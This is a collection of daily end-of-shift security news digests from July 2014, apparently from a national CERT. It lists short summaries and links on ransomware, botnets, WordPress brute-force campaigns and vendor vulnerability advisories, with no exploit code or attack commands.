http://xforce.iss.net/xforce/xfdb/94932
http://xforce.iss.net/xforce/xfdb/94931
http://xforce.iss.net/xforce/xfdb/94930
http://xforce.iss.net/xforce/xfdb/94922
http://xforce.iss.net/xforce/xfdb/94923
http://xforce.iss.net/xforce/xfdb/94921
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 28-07-2014 18:00 − Tuesday 29-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Critroni/Onion - Newest Addition to Encrypting Ransomware ***
---------------------------------------------
In my last blog post about a week ago, I talked about how Cryptolocker and the like are not dead and we will continue to see more of them in action. It's a successful 'business model' and I don't see it going away anytime soon. Not even a few days after my post a new encrypting ransomware emerged. This ..
---------------------------------------------
http://www.webroot.com/blog/2014/07/25/critroni-new-encrypting-ransomware/
*** Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th) ***
---------------------------------------------
Our reader Robin submitted the following detect: Ive got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18453
*** Cisco Prime Data Center Network Manager Input Validation Flaw Permits Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1030652
*** Hackers stole plans for Israel's "Iron Dome" missile shield ***
---------------------------------------------
In a hacking attack on three Israeli arms manufacturers, hackers working for the Chinese government are said to have captured large amounts of important data on the missile defence system in 2011 and 2012. The attackers are said to belong to special unit 61398.
---------------------------------------------
http://www.heise.de/security/meldung/Hacker-klauten-Plaene-fuer-Israels-Rak…
*** Android crypto blunder exposes users to highly privileged malware ***
---------------------------------------------
The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned.
---------------------------------------------
http://arstechnica.com/security/2014/07/android-crypto-blunder-exposes-user…
*** Changes in the Asprox Botnet ***
---------------------------------------------
In this blog post, we took a quick overview of Asprox's functions and saw the updates that it has made to its C&C code. With added RSA encryption, another C&C command, and updated messaging format, it does not look like Asprox will stop evolving. We will continue to monitor Asprox for any changes and will keep you updated.
---------------------------------------------
https://blog.fortinet.com/Changes-in-the-Asprox-Botnet/
*** How Cybercrime Exploits Digital Certificates ***
---------------------------------------------
Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, many of them had serious consequences.
---------------------------------------------
http://resources.infosecinstitute.com/cybercrime-exploits-digital-certifica…
*** Security: antivirus scanners make computers insecure ***
---------------------------------------------
A data expert has examined current virus scanners. Many of them are vulnerable because of simple mistakes, he says. Because they reach deep into the system, they pose a particular danger, even though they are actually supposed to protect it.
---------------------------------------------
http://www.golem.de/news/security-antivirenscanner-machen-rechner-unsicher-…
*** Elasticsearch flaw turns Amazon cloud servers into DDoS zombies ***
---------------------------------------------
A security vulnerability in an older Elasticsearch version lets attackers execute arbitrary malicious code. It is currently being used to hijack servers in Amazon's EC2 cloud and abuse them for DDoS attacks.
---------------------------------------------
http://www.heise.de/security/meldung/Elasticsearch-Luecke-verwandelt-Amazon…
*** Multiple vulnerabilities in Oxwall 1.7.0 ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070156
http://cxsecurity.com/issue/WLB-2014070155
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 25-07-2014 18:00 − Monday 28-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco WebEx Meetings Server Authenticated Encryption Vulnerability ***
---------------------------------------------
A vulnerability in the user.php script of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to view sensitive information.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cacti cross-site scripting ***
---------------------------------------------
Cacti is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the Full Name field to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting ..
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/94862
*** Cisco WebEx Meetings Server OutlookAction Class Vulnerability ***
---------------------------------------------
A vulnerability in the OutlookAction Class of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to enumerate valid user accounts. The vulnerability is due to ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco WebEx Meetings Server Web Framework Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to view sensitive information. The vulnerability occurs because sensitive information is passed in a query string. An attacker could ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Service Drains Competitors' Online Ad Budget ***
---------------------------------------------
The longer one lurks in the Internet underground, the more difficult it becomes to ignore the harsh reality that for nearly every legitimate online business there is a cybercrime-oriented anti-business. Case in point: Today's post looks at a popular service that helps crooked online marketers exhaust the Google AdWords budgets of their competitors.
---------------------------------------------
http://krebsonsecurity.com/2014/07/service-drains-competitors-online-ad-bud…
*** Daimler: in-house hacker group against security vulnerabilities ***
---------------------------------------------
The car manufacturer Daimler employs a permanently staffed group of data specialists whose job is to attack the company's own corporate network. This is meant to uncover security vulnerabilities faster.
---------------------------------------------
http://www.golem.de/news/daimler-mit-eigener-hacker-gruppe-gegen-sicherheit…
*** Ubiquiti UbiFi Controller 2.4.5 Password Hash Disclosure ***
---------------------------------------------
If remote logging is enabled on the UniFi controller, syslog messages are sent to a syslog server. Contained within the syslog messages is the admin password that is used by both the UniFi controller, and all managed Access Points. This CVE was ..
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070146
*** Tails: zero-day in the Invisible Internet Project ***
---------------------------------------------
The Linux distribution Tails contains a security vulnerability through which user identities can be exposed. The flaw is not in Tor but in the Invisible Internet Project network.
---------------------------------------------
http://www.golem.de/news/tails-zero-day-im-invisible-internet-project-1407-…
*** DANE disruptive: authenticated OpenPGP keys in DNS ***
---------------------------------------------
Pretty Good Privacy is to use DNS for key propagation. Next on the agenda of the Internet Engineering Task Force (IETF) developers is the admission of one's own key material.
---------------------------------------------
http://www.heise.de/security/meldung/DANE-disruptiv-Authentifizierte-OpenPG…
*** Behind the Android.OS.Koler distribution network ***
---------------------------------------------
Android.OS.Koler.a is a ransomware program that blocks the screen of an infected device and requests a ransom in order to unlock the device. An entire network of malicious porn sites is linked to a traffic direction system that redirects the victim to different payloads targeting not only mobile devices but any other visitor.
---------------------------------------------
https://securelist.com/blog/research/65189/behind-the-android-os-koler-dist…
*** Dissecting the CVE-2013-2460 Java Exploit ***
---------------------------------------------
In this vulnerability, code is able to get the references of some restricted classes which are cleverly used for privilege escalation and bypassing the JVM sandbox. The vulnerable 'invoke' method of the 'sun.tracing.ProviderSkeleton' class is used to ..
---------------------------------------------
http://research.zscaler.com/2014/07/dissecting-cve-2013-2460-java-exploit.h…
*** Anatomy of an iTunes phish - tips to avoid getting caught out ***
---------------------------------------------
Even if you'd back yourself to spot a phish every time, here's a step-by-step account that might help to save your friends and family in the future...
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/28/anatomy-of-an-itunes-phish-tips-…
*** ICS 3C - ICS Cybersecurity Council Conference ***
---------------------------------------------
ICS 3C gathers experts and decision makers placing Cybersecurity at the heart of a Pan-European Dialogue on solutions for securing critical processes.
---------------------------------------------
http://www.anapur.de/u_e_ICS_Cybersecurity_Conference_2014_HD.htm
*** Trojan: warnings about fake Ikea e-mails ***
---------------------------------------------
Already several thousand sightings; the e-mails are "deceptively genuine" ..
---------------------------------------------
http://derstandard.at/2000003626539
*** Malware, Would You Install it for One Cent? ***
---------------------------------------------
A research study report entitled It's All About The Benjamins: An empirical study on incentivizing users to ignore security ..
---------------------------------------------
http://www.seculert.com/blog/2014/07/would-you-install-potential-malware-fo…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 24-07-2014 18:00 − Friday 25-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** More Details of Onion/Critroni Crypto Ransomware Emerge ***
---------------------------------------------
New ransomware has been dubbed Onion by researchers at Kaspersky Lab as its creators use command and control servers hidden in the Tor Network (a/k/a The Onion Router) to obscure their malicious activity.
---------------------------------------------
http://threatpost.com/onion-ransomware-demands-bitcoins-uses-tor-advanced-e…
*** Kali 1.0.8 released with UEFI boot support, more info at http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/, (Fri, Jul 25th) ***
---------------------------------------------
-- Bojan INFIGO IS (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18443&rss
*** More dangerous than the NSA: companies underestimate criminal hackers ***
---------------------------------------------
The Alliance for Cyber Security at the German Federal Office for Information Security sees the greatest need for improvement in manufacturing companies
---------------------------------------------
http://derstandard.at/2000003528513
*** TAILS Team Recommends Workarounds for Flaw in I2P ***
---------------------------------------------
The developers of the TAILS operating system say that users can mitigate the severity of the critical vulnerability researchers discovered in the I2P software that's bundled with TAILS with a couple of workarounds, but there is no patch for the bug yet. The vulnerability that affects TAILS is in the I2P anonymity network software that comes...
---------------------------------------------
http://threatpost.com/tails-team-recommends-workarounds-for-flaw-in-i2p/107…
*** Fake GoogleBots are third most common DDoS attacker ***
---------------------------------------------
An analysis of 400 million search engine visits to 10,000 sites done by Incapsula researchers has revealed details that might be interesting to web operators and SEO professionals.
---------------------------------------------
http://www.net-security.org/secworld.php?id=17169
*** New SSL server rules go into effect Nov. 1 ***
---------------------------------------------
Public certificate authorities (CAs) are warning that as of Nov. 1 they will reject requests for internal SSL server certificates that don't conform to new internal domain naming and IP address conventions designed to safeguard networks.
---------------------------------------------
http://www.networkworld.com/article/2457649/security0/new-ssl-server-rules-…
*** The App I Used to Break Into My Neighbor's Home ***
---------------------------------------------
Leave your ring of cut-brass secrets unattended on your desk at work, at a bar table while you buy another round, or in a hotel room, and any stranger - or friend - can upload your keys to their online collection.
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/3cdb9908/sc/36/l/0L0Swired0N0C20A…
*** Attackers abusing Internet Explorer to enumerate software and detect security products ***
---------------------------------------------
During the last few years we have seen an increase in the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim's system using Internet Explorer. In this blog post we will describe some of the techniques that attackers are using to perform reconnaissance that gives them information for future attacks. We have also seen these techniques being used to decide whether or not they exploit the victim based on detected...
---------------------------------------------
http://www.alienvault.com/open-threat-exchange/blog/attackers-abusing-inter…
*** Building a Legal Botnet in the Cloud ***
---------------------------------------------
Two researchers have built a botnet using free anonymous accounts. They only collected 1,000 accounts, but there's no reason this can't scale to much larger numbers....
---------------------------------------------
https://www.schneier.com/blog/archives/2014/07/building_a_lega.html
*** Bugtraq: Security advisory for Bugzilla 4.5.5, 4.4.5, 4.2.10, and 4.0.14 ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532895
*** Morpho Itemiser 3 Hard-Coded Credential ***
---------------------------------------------
This advisory provides vulnerability information for hard-coded credentials in the Morpho Itemiser 3.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-205-01
*** VU#394540: Sabre AirCentre Crew contains a SQL injection vulnerability ***
---------------------------------------------
Vulnerability Note VU#394540: Sabre AirCentre Crew contains a SQL injection vulnerability
Original Release date: 25 Jul 2014 | Last revised: 25 Jul 2014
Overview: Sabre AirCentre Crew 2010.2.12.20008 and earlier contains a SQL injection vulnerability.
Description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection). Sabre AirCentre Crew 2010.2.12.20008 and earlier is vulnerable to a SQL Injection attack in the username and password fields in CWPLogin.aspx.
---------------------------------------------
http://www.kb.cert.org/vuls/id/394540
*** Cisco Unified Presence Server Sync Agent Vulnerability ***
---------------------------------------------
CVE-2014-3328
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco WebEx Meetings Server Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
CVE-2014-3305
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco WebEx Meetings Server Stack Trace Vulnerability ***
---------------------------------------------
CVE-2014-3301
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 23-07-2014 18:00 − Thursday 24-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** ZDI-14-264: (0Day) Apple QuickTime mvhd Atom Heap Memory Corruption Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-264/
*** ZDI-14-263: (0Day) Hewlett-Packard Data Protector Cell Request Service Opcode 1091 Directory Traversal Arbitrary File Write Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-263/
*** ZDI-14-262: (0Day) Hewlett-Packard Data Protector Cell Request Service Opcode 305 Directory Traversal Arbitrary File Creation Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-262/
*** [Honeypot Alert] Wordpress XML-RPC Brute Force Scanning ***
---------------------------------------------
There are news reports of new Wordpress XML-RPC brute force attacks being seen in the wild. The SANS Internet Storm Center also has a Diary entry showing similar data. We have captured similar attacks in our web honeypots so we wanted to share more data with the community. Please reference earlier blog posts we have done related to Wordpress: "Wordpress XML-RPC Pingback Vulnerability Analysis" and "Defending Wordpress Logins from Brute Force Attacks". Thanks goes to my SpiderLabs Research colleague
---------------------------------------------
http://blog.spiderlabs.com/2014/07/honeypot-alert-wordpress-xml-rpc-brute-f…
*** Smart Grid Attack Scenarios ***
---------------------------------------------
This is the third (and last) in a series of posts looking at the threats surrounding smart grids and smart meters. In the first post, we introduced smart meters, smart grids, and showed why these can pose risks. In the second post, we looked at the risks of attacks on smart meters. In this post,...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/6sRN65gV904/
*** Windows Previous Versions against ransomware, (Thu, Jul 24th) ***
---------------------------------------------
One of the cool features that Microsoft actually added in Windows Vista is the ability to recover previous versions of files and folders. This is part of the VSS (Volume Shadow Copy Service) which allows automatic creation of backup copies on the system. Most users "virtually meet" this service when they are installing new software, when a restore point is created that allows a user to easily revert the operating system back to the original state, if something goes wrong. However,
---------------------------------------------
https://isc.sans.edu/diary/Windows+Previous+Versions+against+ransomware/184…
*** BMW's ConnectedDrive falls over, bosses blame upgrade snafu ***
---------------------------------------------
Traffic flows up 20% as motorway middle lanes miraculously unclog. BMW's ConnectedDrive car-to-mobe interface has suffered a UK-wide outage that may also affect customers in mainland Europe.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/24/bmw_connect…
*** Dirty Dozen Spampionship - which country is spewing the most spam? ***
---------------------------------------------
The World Cup may be done and dusted, but the Spampionship continues! Where did you come in our spam-sending league tables?
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/22/dirty-dozen-spampionship-which-c…
*** A new generation of ransomware ***
---------------------------------------------
Trojan-Ransom.Win32.Onion is a highly dangerous threat and one of the most technologically advanced encryptors out there. Its developers used both proven techniques 'tested' on its predecessors and solutions that are completely new for this class of malware. The use of an unorthodox cryptographic scheme makes file decryption impossible, even if traffic is intercepted between the Trojan and the server.
---------------------------------------------
https://securelist.com/analysis/publications/64608/a-new-generation-of-rans…
*** Bugcrowd Releases Open Source Vulnerability Disclosure Framework ***
---------------------------------------------
The problems that come from doing security research on modern Web applications and other software aren't just challenging for researchers, but also for the companies on the receiving end of their advisories. Companies unaccustomed to dealing with researchers can find themselves in a difficult position, trying to figure out the clearest path forward. To help...
---------------------------------------------
http://threatpost.com/bugcrowd-releases-open-source-vulnerability-disclosur…
*** SA-CONTRIB-2014-072 - Freelinking, Freelinking Case Tracker - Access bypass ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-072
Project: freelinking (third-party module)
Project: freelinking case tracker (third-party module)
Version: 6.x, 7.x
Date: 2014-July-23
Security risk: Critical
Exploitable from: Remote
Vulnerability: Access bypass
Description: The freelinking and freelinking case tracker modules implement a filter for the easier creation of HTML links to other pages in the site or external sites with a wiki style format such as [[pluginname:identifier]]. The module doesn't sufficiently...
---------------------------------------------
https://www.drupal.org/node/2308503
*** Siemens OpenSSL Vulnerabilities (Update A) ***
---------------------------------------------
This updated advisory is a follow-up to the original advisory titled ICSA-14-198-03 Siemens OpenSSL Vulnerabilities that was published July 17, 2014, on the NCCIC/ICS-CERT web site. This updated advisory provides mitigation details for vulnerabilities in the Siemens OpenSSL cryptographic software library affecting several Siemens industrial products.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-198-03A
*** Sierra Wireless AirLink Raven X EV-DO Vulnerabilities (Update B) ***
---------------------------------------------
This updated advisory is a follow-up to the advisory titled ICSA-14-007-01A Sierra Wireless AirLink Raven X EV-DO Multiple Vulnerabilities that was published January 16, 2014, on the NCCIC/ICS CERT web site.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-007-01B
*** HPSBMU03076 rev.1 - HP Systems Insight Manager (SIM) on Linux and Windows running OpenSSL, Multiple Vulnerabilities ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Systems Insight Manager running on Linux and Windows which could be exploited remotely resulting in multiple vulnerabilities.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBMU03074 rev.1 - HP Insight Control server migration on Linux and Windows running OpenSSL, Remote Denial of Service (DoS), Code Execution, Unauthorized Access, Disclosure of Information ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Insight Control server migration running on Linux and Windows which could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Cisco TelePresence Management Interface Vulnerability ***
---------------------------------------------
CVE-2014-3324
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Bugtraq: Beginners error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account ***
---------------------------------------------
Beginners error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account
---------------------------------------------
http://www.securityfocus.com/archive/1/532875
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 22-07-2014 18:00 − Wednesday 23-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** DDoS attacks remain up, stronger in Q2, report says ***
---------------------------------------------
Prolexic's second quarter DDoS report noted the proliferation of shorter attacks that ate up more bandwidth.
---------------------------------------------
http://www.scmagazine.com/ddos-attacks-remain-up-stronger-in-q2-report-says…
*** De-obfuscating the DOM based JavaScript obfuscation found in EK's such as Fiesta and Rig ***
---------------------------------------------
There is little doubt that exploit kit (EK) developers are continuing to improve their techniques and are making exploit kits harder to detect. They have heavily leveraged obfuscation techniques for JavaScript and are utilizing browser functionality to their advantage. Recent exploit kits such as "Fiesta" and "Rig" for example, have been found to be using DOM based JavaScript obfuscation. In...
---------------------------------------------
http://research.zscaler.com/2014/07/de-obfuscating-dom-based-javascript.html
*** Securing the Nest Thermostat ***
---------------------------------------------
A group of hackers are using a vulnerability in the Nest thermostat to secure it against Nest's remote data collection....
---------------------------------------------
https://www.schneier.com/blog/archives/2014/07/securing_the_ne.html
*** WordPress brute force attack via wp.getUsersBlogs, (Tue, Jul 22nd) ***
---------------------------------------------
Now that the XMLRPC "pingback" DDoS problem in WordPress is increasingly under control, the crooks now seem to try brute force password guessing attacks via the "wp.getUsersBlogs" method of xmlrpc.php. ISC reader Robert sent in some logs that show a massive distributed (> 3000 source IPs) attempt at guessing passwords on his Wordpress installation. The requests look like the one shown below and are posted into xmlrpc.php. Unfortunately, the web server responds with a
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18427&rss
*** New Feature: "Live" SSH Brute Force Logs and New Kippo Client, (Wed, Jul 23rd) ***
---------------------------------------------
We are announcing a new feature we have been working on for a while, that will display live statistics on passwords used by SSH brute forcing bots. In addition, we also updated our script that will allow you to contribute data to this effort. Right now, we are supporting the kippo honeypot to collect data. This script will submit usernames, passwords and the IP address of the attacker to our system. To download the script see https://isc.sans.edu/clients/kippo/kippodshield.pl . The script uses
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18433&rss
*** Work for admins: Apache 2.4.10 plugs security holes ***
---------------------------------------------
For administrators of web servers running Apache 2.4.x, it is time to update. With the latest version of the software, the Apache developers have closed five holes, one of which allows execution of malicious code from the network.
---------------------------------------------
http://www.heise.de/security/meldung/Arbeit-fuer-Admins-Apache-2-4-10-stopf…
*** How Thieves Can Hack and Disable Your Home Alarm System ***
---------------------------------------------
When it comes to the security of the Internet of Things, a lot of the attention has focused on the dangers of the connected toaster, fridge and thermostat. But a more insidious security threat lies with devices that aren't even on the internet: wireless home alarms. Two researchers say that top-selling home alarm setups can...
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/3cc7d302/sc/15/l/0L0Swired0N0C20A…
*** EU to Roll Out Cybercrime Taskforce ***
---------------------------------------------
International Team Will Target Cross-Border Crime Campaigns. The European Union is set to launch a trial run of an international cybercrime task force that will coordinate investigations across Europe, as well as with a handful of other countries, including Australia, Canada and the United States.
---------------------------------------------
http://www.bankinfosecurity.com/eu-to-roll-out-cybercrime-taskforce-a-7093
*** The psychology of phishing ***
---------------------------------------------
Phishing emails are without a doubt one of the biggest security issues consumers and businesses face today. Cybercriminals no longer send out thousands of emails at random hoping to get a handful of hits, today they create highly targeted phishing emails which are tailored to suit their recipients.
---------------------------------------------
http://www.net-security.org/article.php?id=2078
*** Just Released - The Phishing Planning Kit ***
---------------------------------------------
One of the biggest challenges with an effective phishing program is not the technology you use, but how you communicate and implement your phishing program. To assist you in getting the most out of your phishing program we have put together the Phishing Planning Kit. Based on the feedback and input of numerous security awareness officers, this kit...
---------------------------------------------
http://www.securingthehuman.org/blog/2014/07/22/phishing-planning-kit
*** Facebook Scam Leads to Nuclear Exploit Kit ***
---------------------------------------------
Attackers have become more aggressive and are now using Facebook scams to lead to exploit kits so they can control a user's system.
---------------------------------------------
http://www.symantec.com/connect/blogs/facebook-scam-leads-nuclear-exploit-k…
*** Cisco IOS XR Software NetFlow Processing Denial of Service Vulnerability ***
---------------------------------------------
CVE-2014-3322
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** SonicWALL GMS 7.2 Build 7221.1701 Cross Site Scripting ***
---------------------------------------------
Topic: SonicWALL GMS 7.2 Build 7221.1701 Cross Site Scripting
Risk: Low
Text: I. VULNERABILITY - Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701 II. BACKGROUND ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070121
*** Barracuda Networks Spam And Virus Firewall 6.0.2 XSS ***
---------------------------------------------
Topic: Barracuda Networks Spam And Virus Firewall 6.0.2 XSS
Risk: Low
Text: Document Title: Barracuda Networks Spam&Virus Firewall v6.0.2 (600 & Vx) - Client Side Cross Site Vulnerability Re...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070118
*** Security Notice-Statement on the XSS Security Vulnerability in Huawei E355 ***
---------------------------------------------
Jul 23, 2014 17:37
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** SSA-214365 (Last Update 2014-07-23): Vulnerabilities in SIMATIC WinCC ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Omron NS Series HMI Vulnerabilities ***
---------------------------------------------
This advisory provides mitigation details for multiple vulnerabilities in Omron Corporation's NS series human-machine interface (HMI) terminals.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-203-01
*** Honeywell FALCON XLWeb Controllers Vulnerabilities ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on June 24, 2014, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for vulnerabilities in Honeywell FALCON XLWeb controllers.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-175-01
*** HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information ***
---------------------------------------------
A potential security vulnerability has been identified with HP Network Virtualization. The vulnerability could be exploited remotely to allow execution of code and disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 21-07-2014 18:00 − Tuesday 22-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Retefe banking trojan ***
---------------------------------------------
Most [...] banking trojans are based on technically rather complex software components: encrypted configurations, man-in-the-browser functionality, persistence and update mechanisms, to name a few. In the last half year an entirely new variant has established itself, one that only received a name in February 2014: Retefe.
---------------------------------------------
http://securityblog.switch.ch/2014/07/22/retefe-bankentrojaner/
*** IBM Fixes Code Execution, Cookie-Stealing Vulnerabilities in Switches ***
---------------------------------------------
IBM recently patched a handful of vulnerabilities in some of its KVM switches that, if exploited, could have given an attacker free rein over any system attached to it.
---------------------------------------------
http://threatpost.com/ibm-fixes-code-execution-cookie-stealing-vulnerabilit…
*** Mobile App Wall of Shame: CNN App for iPhone ***
---------------------------------------------
The CNN App for iPhone is one of the most popular news applications available for the iPhone. At present, it is sitting at #2 in the iTunes free News app category and #165 among all free apps. Along with providing news stories, alerts and live video, it also includes iReport functionality, allowing...
---------------------------------------------
http://research.zscaler.com/2014/07/cnn-app-for-iphone.html
*** OWASP Zed Attack Proxy, (Mon, Jul 21st) ***
---------------------------------------------
Affectionately known as ZAP, the OWASP Zed Attack Proxy is an excellent web application testing tool. It finds its way into the hands of experienced penetration testers, newer security administrators, vulnerability assessors, as well as auditors and the curious. One of the reasons for its popularity is the ease of use and the extensive granular capability to examine transactions. While some may know ZAP as a fork or successor to the old Paros proxy, it is so much more. Roughly 20% of the code base...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18421&rss
*** Old and Persistent Malware ***
---------------------------------------------
User error is the best reason to explain why Excel spreadsheets infected with the Laroux macro virus have been published on the China Securities Regulatory Commission website (csrc.gov.cn). The commission regulates China's financial markets and provides an online law library on their website where visitors can download various files and texts. Two of the files available in the library contain the MSEXcel.Laroux virus.
---------------------------------------------
https://blogs.cisco.com/security/old-and-persistent-malware/
*** FakeNet Malware Analysis ***
---------------------------------------------
FakeNet is a tool that aids in the dynamic analysis of malicious software. The tool simulates a network so that malware interacting with a remote host continues to run allowing the analyst to observe the malware's network activity from within a safe environment.
---------------------------------------------
http://www.ehacking.net/2014/07/fakenet-malware-analysis.html
*** Cisco router hole: the mysterious advance patch ***
---------------------------------------------
The critical security hole that makes nine Cisco routers and cable modems vulnerable to attacks from the network was closed years ago at German providers with an update. However, it remains unclear why Cisco only made the fix public now.
---------------------------------------------
http://www.heise.de/security/meldung/Cisco-Routerluecke-Der-mysterioese-Vor…
*** App "telemetry", (Tue, Jul 22nd) ***
---------------------------------------------
ISC reader James had just installed "Foxit Reader" on his iPhone, and had answered "NO" to the "In order to help us improve Foxit Mobile PDF, we would like to collect anonymous usage data..." question, when he noticed his phone talking to China anyway. The connected-to site was alog.umeng.com, 211.151.151.7. Umeng is an "application telemetry" and online advertising company. Below is what was sent (some of the ids are masked or have been obfuscated) I
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18425&rss
*** Massive Malware Infection Breaking WordPress Sites ***
---------------------------------------------
The last few days have brought about a massive influx of broken WordPress websites. What makes it so unique is that the malicious payload is being blindly injected, which is causing websites to break. While we're still researching, we do want to share some observations: This infection is aimed at websites built on the...
---------------------------------------------
http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.h…
*** Privacy Badger Extension Blocks Tracking Through Social Icons ***
---------------------------------------------
Online tracking has been a thorny problem for years, and as Web security companies, browser vendors and users have become more aware of the problem and smarter about how to defend themselves, ad companies and trackers have responded in kind. The advent of social networks has made it far easier for tracking companies to monitor user behavior across...
---------------------------------------------
http://threatpost.com/privacy-badger-extension-blocks-tracking-through-soci…
*** [webapps] - MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities ***
---------------------------------------------
http://www.exploit-db.com/exploits/34128
*** Apache Multiple Flaws Let Remote Users Deny Service or Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030615
*** Tenable Nessus Access Control Flaw in Web UI Lets Remote Users Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1030614
*** Apache Scoreboard / Status Race Condition ***
---------------------------------------------
Topic: Apache Scoreboard / Status Race Condition
Risk: Medium
Text: Hi there, --[ 0. Sparse summary Race condition between updating ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070114
*** HPSBMU03071 rev.1 - HP Autonomy IDOL, Running OpenSSL, Remote Unauthorized Access, Disclosure of Information ***
---------------------------------------------
A potential security vulnerability has been identified with HP Autonomy IDOL. The vulnerability could be exploited to allow remote unauthorized access and disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Moodle rubric/advanced grading cross-site scripting ***
---------------------------------------------
Moodle rubric/advanced grading cross-site scripting
---------------------------------------------
